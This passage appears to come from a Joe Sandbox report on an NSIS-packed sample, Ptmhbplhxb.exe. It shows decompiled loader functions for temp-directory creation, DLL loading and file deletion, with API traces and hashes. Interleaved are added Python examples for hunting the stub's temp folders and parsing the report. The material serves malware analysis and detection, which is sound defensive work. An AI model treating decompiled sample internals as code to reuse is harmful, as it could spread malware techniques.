                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: ErrorLast$CreateDirectoryFileSecurity
                • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop
                • API String ID: 3449924974-2752704311
                • Opcode ID: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
                • Instruction ID: d93b5df8f7ffc7c008eac1e7bdc238e6dcac3e6f5ce479452586b7e310885e58
                • Opcode Fuzzy Hash: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
                • Instruction Fuzzy Hash: 550108B1C00219EADF11DBA1CD047EFBFB9EF04354F00803AD545B6290D77896088FA9
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                Basic blocks (image not extracted; executed/not-executed colouring lost): 40628f-4062af GetSystemDirectoryA; 4062b1; 4062b3-4062b5; 4062b7-4062bf; 4062c1-4062c3; 4062c5-4062c7; 4062c8-4062fa wsprintfA, LoadLibraryExA.
                C-Code - Quality: 100%
                			E0040628F(intOrPtr _a4) {
                				char _v292;
                				int _t10;
                				struct HINSTANCE__* _t14;
                				void* _t16;
                				void* _t21;
                
                				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                				if(_t10 > 0x104) {
                					_t10 = 0;
                				}
                				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                					_t16 = 1;
                				} else {
                					_t16 = 0;
                				}
                				_t5 = _t16 + 0x40a014; // 0x5c
                				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                				return _t14;
                			}

                APIs
                • GetSystemDirectoryA.KERNEL32 ref: 004062A6
                • wsprintfA.USER32 ref: 004062DF
                • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: DirectoryLibraryLoadSystemwsprintf
                • String ID: %s%s.dll$UXTHEME$\
                • API String ID: 2200240437-4240819195
                • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                • Instruction ID: 90c405808a5079913e9fc86ee6967ca4c100a0af48b71fe7beb271d56a4ee20c
                • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                • Instruction Fuzzy Hash: 89F0F630510609AADB15AB64DD0DFEB365CAB08304F1405BEA686F11C1EA78E9398B99
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                Basic blocks (image not extracted; executed/not-executed colouring lost): 405b2d-405b37; 405b38-405b63 GetTickCount, GetTempFileNameA; 405b65-405b67 (loops back to 405b38); 405b69; 405b6c-405b6f; 405b72-405b74.
                C-Code - Quality: 100%
                			E00405B2D(char _a4, intOrPtr _a6, CHAR* _a8) {
                				char _t11;
                				signed int _t12;
                				int _t15;
                				signed int _t17;
                				void* _t20;
                				CHAR* _t21;
                
                				_t21 = _a4;
                				_t20 = 0x64;
                				while(1) {
                					_t11 =  *0x40a3b4; // 0x61736e
                					_t20 = _t20 - 1;
                					_a4 = _t11;
                					_t12 = GetTickCount();
                					_t17 = 0x1a;
                					_a6 = _a6 + _t12 % _t17;
                					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                					if(_t15 != 0) {
                						break;
                					}
                					if(_t20 != 0) {
                						continue;
                					}
                					 *_t21 =  *_t21 & 0x00000000;
                					return _t15;
                				}
                				return _t21;
                			}

                APIs
                • GetTickCount.KERNEL32 ref: 00405B41
                • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B5B
                Strings
                • "C:\Users\user\Desktop\Ptmhbplhxb.exe", xrefs: 00405B2D
                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405B30
                • nsa, xrefs: 00405B38
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CountFileNameTempTick
                • String ID: "C:\Users\user\Desktop\Ptmhbplhxb.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                • API String ID: 1716503409-3543304719
                • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                • Instruction ID: 439a7608ba980c1fff97265348ba0c774925dff8d33d3cb941cf273fff524f8a
                • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                • Instruction Fuzzy Hash: B0F082363042086BDB108F66DD04B9B7BA9DF91750F14803BFA48AA280D6B4E9588799
                Uniqueness

                Uniqueness Score: -1.00%
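                What E00405B2D above computes, written out as an added Python example (not part of this report and not the sample's own code): the prefix handed to GetTempFileNameA is the three bytes "nsa" stored at 0x40a3b4, with the third byte advanced by GetTickCount() mod 26, so the scratch directory the stub drops is always named ns<letter><hex>.tmp; the report's own string C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp has exactly that shape. The generator below reproduces the prefix arithmetic and the matcher is a hunting aid for file-creation telemetry. Assumptions: GetTempFileNameA with uUnique set to 0 appends up to four hex digits and ".tmp" to the three-character prefix (documented Win32 behaviour; the case of the digits and extension as observed in the report); the tick values and paths used as input are constructed.

```python
import re
from typing import Optional

# Values taken from the decompilation of E00405B2D: the seed at 0x40a3b4
# (0x0061736e, little-endian "nsa") and the 0x64 retry budget in _t20.
PREFIX_SEED = b"nsa"
MAX_TRIES = 100


def nsis_temp_prefix(tick_count: int) -> str:
    """Prefix passed to GetTempFileNameA: 'ns' followed by chr('a' + tick % 26).

    This mirrors `_a6 = _a6 + GetTickCount() % 0x1a` in the decompilation,
    which adds the remainder to the third byte of the seed.
    """
    letter = PREFIX_SEED[2] + (tick_count % 26)
    return (PREFIX_SEED[:2] + bytes([letter])).decode("ascii")


def nsis_temp_name(tick_count: int, unique: int) -> str:
    """Name GetTempFileNameA(dir, prefix, 0, buf) yields for a given unique value.

    Assumption (documented Win32 behaviour): the unique value is rendered as
    up to four hex digits and '.tmp' is appended to the three-character prefix.
    """
    if not 0 < unique <= 0xFFFF:
        raise ValueError("GetTempFileName unique values lie in 1..0xFFFF")
    return f"{nsis_temp_prefix(tick_count)}{unique:X}.tmp"


# Hunting pattern: 'ns' + one letter + 1-4 hex digits + '.tmp' as a path
# component directly under a user's Temp directory (case-insensitive).
_NSIS_TMP_RE = re.compile(
    r"(?i)\\AppData\\Local\\Temp\\(ns[a-z][0-9a-f]{1,4}\.tmp)(?:\\|$)"
)


def match_nsis_temp_dir(path: str) -> Optional[str]:
    """Return the nsXnnnn.tmp component if *path* looks like an NSIS scratch
    directory (or a file inside one), otherwise None."""
    m = _NSIS_TMP_RE.search(path)
    return m.group(1) if m else None


if __name__ == "__main__":
    # Constructed inputs: a tick count whose remainder mod 26 is 16 ('q') and
    # the unique value 0x9535 reproduce the directory name seen in the report.
    print(nsis_temp_name(16, 0x9535))
    print(match_nsis_temp_dir(r"C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\System.dll"))
```

The letter alone gives only 26 distinct prefixes, so a file-creation rule keyed on the full pattern (Temp path, ns, one letter, hex digits, .tmp) is a far better signal than any single observed name such as nsq9535.tmp, which changes on every run.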

                Control-flow Graph

                Basic blocks (image not extracted; executed/not-executed colouring lost): 4059eb-405a06 call 405f65, call 405996; 405a08-405a0a; 405a0c-405a19 call 4061cf; 405a1b-405a1f; 405a21-405a23; 405a25-405a27; 405a29-405a30 call 406268; 405a32-405a35; 405a37-405a38 call 405944; 405a3d-405a46 lstrlenA; 405a48-405a5c call 4058fd, GetFileAttributesA; 405a5e-405a60.
                C-Code - Quality: 53%
                			E004059EB(void* __eflags, intOrPtr _a4) {
                				int _t11;
                				signed char* _t12;
                				long _t16;
                				intOrPtr _t18;
                				intOrPtr* _t21;
                				void* _t22;
                
                				E00405F65(0x42bc78, _a4);
                				_t21 = E00405996(0x42bc78);
                				if(_t21 != 0) {
                					E004061CF(_t21);
                					if(( *0x42f41c & 0x00000080) == 0) {
                						L5:
                						_t22 = _t21 - 0x42bc78;
                						while(1) {
                							_t11 = lstrlenA(0x42bc78);
                							_push(0x42bc78);
                							if(_t11 <= _t22) {
                								break;
                							}
                							_t12 = E00406268();
                							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                								E00405944(0x42bc78);
                								continue;
                							} else {
                								goto L1;
                							}
                						}
                						E004058FD();
                						_t16 = GetFileAttributesA(??); // executed
                						return 0 | _t16 != 0xffffffff;
                					}
                					_t18 =  *_t21;
                					if(_t18 == 0 || _t18 == 0x5c) {
                						goto L1;
                					} else {
                						goto L5;
                					}
                				}
                				L1:
                				return 0;
                			}

                APIs
                  • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,Setup Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
                  • Part of subcall function 00405996: CharNextA.USER32(?,?,C:\,?,00405A02,C:\,C:\,772EFA90,?,C:\Users\user~1\AppData\Local\Temp\,0040574D,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004059A4
                  • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059A9
                  • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059BD
                • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,772EFA90,?,C:\Users\user~1\AppData\Local\Temp\,0040574D,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405A3E
                • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,772EFA90,?,C:\Users\user~1\AppData\Local\Temp\,0040574D,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\), ref: 00405A4E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                • String ID: C:\$C:\Users\user~1\AppData\Local\Temp\
                • API String ID: 3248276644-1077792641
                • Opcode ID: abce9bb9807016b4c276db8bae45b4b3eed95d690bc7d0fbdb1e72e6f8ad0fcb
                • Instruction ID: 1f06baf1138d21f74630751e728cacf5283a8138a78bcc2982ba797f27b9272c
                • Opcode Fuzzy Hash: abce9bb9807016b4c276db8bae45b4b3eed95d690bc7d0fbdb1e72e6f8ad0fcb
                • Instruction Fuzzy Hash: 53F0C831315DA256C622323A1D45AAF1B45CE87338709477FF891B12D2EB3C89439EBD
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                Basic blocks (image not extracted; executed/not-executed colouring lost): 401ffd-402009; 40200f-402025 call 402ac1 (twice); 402027-402032 GetModuleHandleA; 402034-402042 LoadLibraryExA; 402044-402051 GetProcAddress; 402053-402059; 40205b-402067 call 401423; 402069-402070; 402072-40208e; 402090-402095 call 40508c; 40209a-40209d; 4020a3-4020ab call 403755; 4020b1-4020b8 FreeLibrary; 4020bd-4020bf; 4020c4-4020c6; 402237-40223c call 401423; 402716-40271d; 402951-402960.
                C-Code - Quality: 60%
                			E00401FFD(void* __ebx, void* __eflags) {
                				struct HINSTANCE__* _t18;
                				struct HINSTANCE__* _t26;
                				void* _t27;
                				struct HINSTANCE__* _t30;
                				CHAR* _t32;
                				intOrPtr* _t33;
                				void* _t34;
                
                				_t27 = __ebx;
                				asm("sbb eax, 0x42f4d8");
                				 *(_t34 - 4) = 1;
                				if(__eflags < 0) {
                					_push(0xffffffe7);
                					L15:
                					E00401423();
                					L16:
                					 *0x42f4a8 =  *0x42f4a8 +  *(_t34 - 4);
                					return 0;
                				}
                				_t32 = E00402AC1(0xfffffff0);
                				 *(_t34 + 8) = E00402AC1(1);
                				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                					L3:
                					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                					_t30 = _t18;
                					if(_t30 == _t27) {
                						_push(0xfffffff6);
                						goto L15;
                					}
                					L4:
                					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                					if(_t33 == _t27) {
                						E0040508C(0xfffffff7,  *(_t34 + 8));
                					} else {
                						 *(_t34 - 4) = _t27;
                						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b81c, 0x40a000);
                						} else {
                							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                							if( *_t33() != 0) {
                								 *(_t34 - 4) = 1;
                							}
                						}
                					}
                					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403755(_t30) != 0) {
                						FreeLibrary(_t30); // executed
                					}
                					goto L16;
                				}
                				_t26 = GetModuleHandleA(_t32); // executed
                				_t30 = _t26;
                				if(_t30 != __ebx) {
                					goto L4;
                				}
                				goto L3;
                			}

                APIs
                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402028
                  • Part of subcall function 0040508C: lstrlenA.KERNEL32(0042A050,00000000,00419517,772EEA30,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
                  • Part of subcall function 0040508C: lstrlenA.KERNEL32(004030DC,0042A050,00000000,00419517,772EEA30,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
                  • Part of subcall function 0040508C: lstrcatA.KERNEL32(0042A050,004030DC,004030DC,0042A050,00000000,00419517,772EEA30), ref: 004050E8
                  • Part of subcall function 0040508C: SetWindowTextA.USER32(0042A050,0042A050), ref: 004050FA
                  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
                  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
                  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402038
                • GetProcAddress.KERNEL32(00000000,?), ref: 00402048
                • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B2
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                • String ID:
                • API String ID: 2987980305-0
                • Opcode ID: c269c81cb85478e00bfc3d4b8c9c0837da33454893b7d03bdc32fa3c52a9d6d9
                • Instruction ID: 3b54ba627a5d3606a08c88bc2c88048367fe0e0edc5ddf34d35ff9eabd327fef
                • Opcode Fuzzy Hash: c269c81cb85478e00bfc3d4b8c9c0837da33454893b7d03bdc32fa3c52a9d6d9
                • Instruction Fuzzy Hash: A721DB71A04225ABCF207FA48E49B6E7670AB14358F20413BFB11B62D0CBBD4942966E
                Uniqueness

                Uniqueness Score: -1.00%
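                The APIs blocks in this report have a fixed shape: "• Name.Module(args), ref: ADDR", with "Part of subcall function XXXX:" prefixed to calls made by a callee, and "?" for arguments the analyser could not recover. As an added Python example that is not part of the report, the parser below turns such lines into records and then summarises library loading by decoding the dwFlags argument of LoadLibraryExA, which both E00401FFD (the plugin loader above) and E0040628F (the system-directory loader) pass as 00000008, LOAD_WITH_ALTERED_SEARCH_PATH. The sample lines are copied from the APIs blocks of those two functions; the flag names come from the Win32 headers; the function and class names are this example's own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Sample input: lines copied verbatim from the APIs blocks of E00401FFD and
# E0040628F in this report (used here as embedded test data).
SAMPLE_LINES = """
• GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402028
  • Part of subcall function 0040508C: lstrlenA.KERNEL32(0042A050,00000000,00419517,772EEA30,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
• LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402038
• GetProcAddress.KERNEL32(00000000,?), ref: 00402048
• FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B2
• GetSystemDirectoryA.KERNEL32 ref: 004062A6
• LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F3
"""

# One report line: optional "Part of subcall function XXXX:", then
# Name.Module, optional "(args)", then "ref: ADDR".
_API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# dwFlags bits of LoadLibraryEx, as defined in the Win32 headers.
LOADLIBRARYEX_FLAGS = {
    0x00000001: "DONT_RESOLVE_DLL_REFERENCES",
    0x00000002: "LOAD_LIBRARY_AS_DATAFILE",
    0x00000008: "LOAD_WITH_ALTERED_SEARCH_PATH",
    0x00000010: "LOAD_IGNORE_CODE_AUTHZ_LEVEL",
    0x00000020: "LOAD_LIBRARY_AS_IMAGE_RESOURCE",
    0x00000040: "LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE",
    0x00000100: "LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR",
    0x00000200: "LOAD_LIBRARY_SEARCH_APPLICATION_DIR",
    0x00000400: "LOAD_LIBRARY_SEARCH_USER_DIRS",
    0x00000800: "LOAD_LIBRARY_SEARCH_SYSTEM32",
    0x00001000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS",
}


@dataclass
class ApiCall:
    name: str
    module: str
    ref: int                      # address of the call site
    args: List[Optional[int]]     # None where the report shows "?"
    subcall_of: Optional[int] = None   # address of the callee that made the call


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one APIs-block line; return None for headings and blank lines."""
    m = _API_RE.match(line)
    if not m:
        return None
    args: List[Optional[int]] = []
    if m["args"]:
        for raw in m["args"].split(","):
            raw = raw.strip()
            args.append(int(raw, 16) if re.fullmatch(r"[0-9A-Fa-f]+", raw) else None)
    sub = int(m["sub"], 16) if m["sub"] else None
    return ApiCall(m["name"], m["module"], int(m["ref"], 16), args, sub)


def parse_api_block(text: str) -> List[ApiCall]:
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c]


def decode_loadlibraryex_flags(flags: int) -> List[str]:
    """Names of the known dwFlags bits set in *flags*, plus any unknown residue."""
    names = [n for bit, n in LOADLIBRARYEX_FLAGS.items() if flags & bit]
    leftover = flags & ~sum(LOADLIBRARYEX_FLAGS)
    if leftover:
        names.append(f"UNKNOWN_0x{leftover:08X}")
    return names


def summarise_library_loads(calls: List[ApiCall]) -> List[Tuple[int, List[str]]]:
    """(call-site address, decoded dwFlags) for every direct LoadLibraryExA call
    whose third argument (dwFlags) the report recovered."""
    out = []
    for c in calls:
        if c.name == "LoadLibraryExA" and c.subcall_of is None \
                and len(c.args) >= 3 and c.args[2] is not None:
            out.append((c.ref, decode_loadlibraryex_flags(c.args[2])))
    return out


if __name__ == "__main__":
    for ref, flags in summarise_library_loads(parse_api_block(SAMPLE_LINES)):
        print(f"LoadLibraryExA at {ref:08X}: {', '.join(flags)}")
```

Run over a whole report this gives a quick inventory of which call sites load code and with which search semantics; LOAD_WITH_ALTERED_SEARCH_PATH with an absolute path (as in E0040628F) resolves dependencies from the DLL's own directory rather than the process directory, which is the part worth checking when a dropped plugin is loaded from the nsXnnnn.tmp scratch directory.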

                Control-flow Graph

                Basic blocks (image not extracted; executed/not-executed colouring lost): 4015bb-4015ce call 402ac1, call 405996; 4015d0-4015e3 call 405928; 4015e5-4015e8; 4015ea-4015f1 call 4055ec; 4015f3-4015f4 call 405552; 4015f9; 4015fb-4015fc call 4055cf; 401601-401603; 401605-40160a; 40160c-401615 GetFileAttributesA; 401617; 40161a-401622 (loops back to 4015d0); 401624-401627; 401629-401644 call 401423, call 405f65, SetCurrentDirectoryA; 40164a-40164d; 401652-40223c call 401423; 402716-40271d; 402951-402960.
                C-Code - Quality: 87%
                			E004015BB(char __ebx, void* __eflags) {
                				void* _t13;
                				int _t19;
                				char _t21;
                				void* _t22;
                				char _t23;
                				signed char _t24;
                				char _t26;
                				CHAR* _t28;
                				char* _t32;
                				void* _t33;
                
                				_t26 = __ebx;
                				_t28 = E00402AC1(0xfffffff0);
                				_t13 = E00405996(_t28);
                				_t30 = _t13;
                				if(_t13 != __ebx) {
                					do {
                						_t32 = E00405928(_t30, 0x5c);
                						_t21 =  *_t32;
                						 *_t32 = _t26;
                						 *((char*)(_t33 + 0xb)) = _t21;
                						if(_t21 != _t26) {
                							L5:
                							_t22 = E004055CF(_t28);
                						} else {
                							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004055EC(_t39) == 0) {
                								goto L5;
                							} else {
                								_t22 = E00405552(_t28); // executed
                							}
                						}
                						if(_t22 != _t26) {
                							if(_t22 != 0xb7) {
                								L9:
                								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                							} else {
                								_t24 = GetFileAttributesA(_t28); // executed
                								if((_t24 & 0x00000010) == 0) {
                									goto L9;
                								}
                							}
                						}
                						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                						 *_t32 = _t23;
                						_t30 = _t32 + 1;
                					} while (_t23 != _t26);
                				}
                				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                					_push(0xfffffff5);
                					E00401423();
                				} else {
                					E00401423(0xffffffe6);
                					E00405F65("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\nsq9535.tmp", _t28);
                					_t19 = SetCurrentDirectoryA(_t28); // executed
                					if(_t19 == 0) {
                						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                					}
                				}
                				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t33 - 4));
                				return 0;
                			}

                APIs
                  • Part of subcall function 00405996: CharNextA.USER32(?,?,C:\,?,00405A02,C:\,C:\,772EFA90,?,C:\Users\user~1\AppData\Local\Temp\,0040574D,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004059A4
                  • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059A9
                  • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059BD
                • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                  • Part of subcall function 00405552: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405595
                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp,00000000,00000000,000000F0), ref: 0040163C
                Strings
                • C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp, xrefs: 00401631
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                • String ID: C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp
                • API String ID: 1892508949-1390092544
                • Opcode ID: 6e9d8b0bdd6535f5ad521cfe25d2546e39bd3477eb11d702e3e3618c9b95e55c
                • Instruction ID: 323619fe81b3529d61600e1e0eff0ce417d4ac591c1c2d39a63079fc07480124
                • Opcode Fuzzy Hash: 6e9d8b0bdd6535f5ad521cfe25d2546e39bd3477eb11d702e3e3618c9b95e55c
                • Instruction Fuzzy Hash: 2B11C431608152EBCB217BA54D415BF2AB4DA96324B28093FE9D1B22E2D63D4D425A2E
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                Basic blocks (image not extracted; executed/not-executed colouring lost): 4056e5-4056f6 call 405ad9; 4056f8-4056fe; 405700-405706 RemoveDirectoryA; 405708 DeleteFileA; 40570e-405710; 405712-405715; 405717-40571c; 40571e-405720 SetFileAttributesA; 405726; 405728-40572a.
                C-Code - Quality: 41%
                			/* Delete one file or directory after clearing its read-only bit. Bit 0 of _a8
                			 * selects RemoveDirectoryA instead of DeleteFileA; bit 2 suppresses restoring the
                			 * original attributes when the delete fails. Returns 1 on success, 0 otherwise. */
                			int E004056E5(void* __eflags, CHAR* _a4, signed int _a8) {
                				int _t9;
                				long _t13;
                				CHAR* _t14;
                
                				_t14 = _a4;
                				_t13 = E00405AD9(_t14);            /* strips FILE_ATTRIBUTE_READONLY, returns the old attributes */
                				if(_t13 == 0xffffffff) {           /* INVALID_FILE_ATTRIBUTES: nothing to delete */
                					return 0;
                				}
                				if((_a8 & 0x00000001) == 0) {
                					_t9 = DeleteFileA(_t14); // executed
                				} else {
                					_t9 = RemoveDirectoryA(_t14); // executed
                				}
                				if(_t9 != 0) {
                					return 1;
                				}
                				if((_a8 & 0x00000004) == 0) {
                					SetFileAttributesA(_t14, _t13); /* delete failed: put the original attributes back */
                				}
                				return 0;
                			}







                APIs
                  • Part of subcall function 00405AD9: GetFileAttributesA.KERNELBASE(?,?,004056F1,?,?,00000000,004058D4,?,?,?,?), ref: 00405ADE
                  • Part of subcall function 00405AD9: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405AF2
                • RemoveDirectoryA.KERNELBASE(?,?,?,00000000,004058D4), ref: 00405700
